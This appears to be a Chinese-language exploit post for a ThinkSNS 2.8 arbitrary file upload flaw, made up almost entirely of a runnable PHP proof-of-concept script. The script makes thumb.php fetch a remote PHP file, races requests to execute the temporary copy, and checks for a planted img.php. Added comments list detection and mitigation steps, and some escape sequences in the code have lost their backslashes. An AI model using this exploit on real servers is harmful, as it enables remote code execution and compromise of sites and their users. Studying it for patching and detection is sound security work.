作者:wepeng
存在漏洞的版本为:最新的2.8稳定版。
漏洞分析省略。
Exploit文件内容如下:
<?php
/*
 * Proof-of-concept for the ThinkSNS "arbitrary file upload" issue described above
 * (the page names the 2.8 stable release as affected).
 *
 * What the script shows about the weakness (read from the requests it builds):
 *   - thumb.php accepts a `url` parameter that points at a remote file.
 *   - The script then requests data/thumb_temp/<md5(url)><extension of url>, i.e. it
 *     expects the fetched file to be reachable under the web root with the extension
 *     taken from the supplied URL.
 *   - Success is judged by whether data/thumb_temp/img.php answers "200 OK";
 *     presumably the fetched file creates img.php when the server executes it
 *     (not shown on this page -- confirm against the application code).
 *
 * Defender notes:
 *   - Detection: access-log entries for thumb.php whose `url` value does not end in an
 *     image extension; bursts of GETs for data/thumb_temp/<32 hex chars>.<ext> from one
 *     client; any script file (for example img.php) present in data/thumb_temp/.
 *   - Mitigation: disable script execution for data/thumb_temp/ in the web server
 *     configuration, have thumb.php accept only image extensions and verified image
 *     content, keep temporary files outside the web root, and apply the vendor fix
 *     if one is available.
 */
error_reporting(0); // suppresses all PHP warnings/notices, including socket errors
set_time_limit(0); // removes the execution time limit
ini_set("default_socket_timeout", 5);

/*
 * Opens a connection to $host:$port with fsockopen(), writes $headers to it and
 * returns the open handle. Terminates the script if the connection fails.
 * The caller is responsible for closing the handle.
 */
function http_send($host, $port, $headers)
{
    $fp = fsockopen($host, $port);
    if (!$fp) die('Connection -> fail');
    fputs($fp, $headers);
    return $fp;
}

/*
 * Reads from $fp until EOF (fgets with a 1024-byte limit per call), closes the
 * handle and returns everything read as one string.
 */
function http_recv($fp)
{
    $ret="";
    while (!feof($fp)) $ret.= fgets($fp, 1024);
    fclose($fp);
    return $ret;
}

print "n# ThinkSns Arbitrary File Upload #n";
print "# Discovered by 韦鲲鹏 #nn";

// Three command-line arguments are required: host, application path, remote URL.
if ($argc < 4) {
    print "Usage: php <host> <path> <romote_url>n";
    print "Example: php localhost /thinksns/ http://localhost/test/123.php";
    die();
}

$host = $argv[1];
$path = $argv[2];
$url = $argv[3];
$i=0;

// Upload request: asks thumb.php to process the file at the supplied URL.
$headers_up = "GET {$path}thumb.php?url=".$url." HTTP/1.1rn";
$headers_up .= "Host: ".$host."rn";
$headers_up .= "Connection: closernrn";
echo $headers_up;

// Request for the temporary file: name is md5 of the URL plus the URL's last ".ext".
$headers = "GET {$path}data/thumb_temp/".md5($url).strrchr($url,".")." HTTP/1.1rn";
$headers .= "Host: ".$host."rn";
$headers .= "Connection: closernrn";
echo $headers;

// Nine requests for the temporary file are sent before the thumb.php request;
// each socket is closed immediately, so the responses are never read.
while(++$i<10) {
    fclose(http_send($host, 80, $headers));
}

// The single thumb.php request. The port is hard-coded to 80 throughout.
fclose(http_send($host, 80, $headers_up));

// $i carries over from the first loop, so this sends 39 more temp-file requests.
// NOTE(review): the request ordering suggests the temporary file exists only briefly
// and the script tries to hit it inside that window -- confirm against thumb.php.
while(++$i<50) {
    fclose(http_send($host, 80, $headers));
}

// Final check: request data/thumb_temp/img.php and look for "200 OK" in the reply.
$headers = "GET {$path}data/thumb_temp/img.php HTTP/1.1rn";
$headers .= "Host: ".$host."rn";
$headers .= "Connection: closernrn";
$res=http_recv(http_send($host, 80, $headers));
if(preg_match('/200 OK/',$res)) {
    print "Success!nn";
} else {
    print "Fail!nn";
}
?>